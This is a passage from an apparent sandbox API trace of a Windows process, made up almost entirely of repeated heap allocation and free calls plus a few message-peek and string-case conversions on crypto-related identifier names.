Size=0x10) returned 0x9b9a60 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0186.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0186.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0186.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3928) returned 0xbed948 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0186.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0186.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0186.929] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0186.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0186.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0186.929] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0186.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0186.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0186.929] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0186.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27e8 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0186.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0186.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0186.930] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0186.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0186.930] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0186.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0186.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0186.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.931] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0186.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0186.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0186.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0186.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0186.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0186.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0186.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0186.932] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0186.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0186.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.933] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0186.933] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0186.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0186.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0186.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0186.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0186.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0186.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0186.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0186.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0186.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0186.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0186.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0186.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0186.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0186.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0186.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0186.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0186.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0186.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0186.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0186.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0186.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0186.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0186.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0186.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0186.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0186.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0186.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0186.936] HeapFree (in: hHeap=0x8a0000, 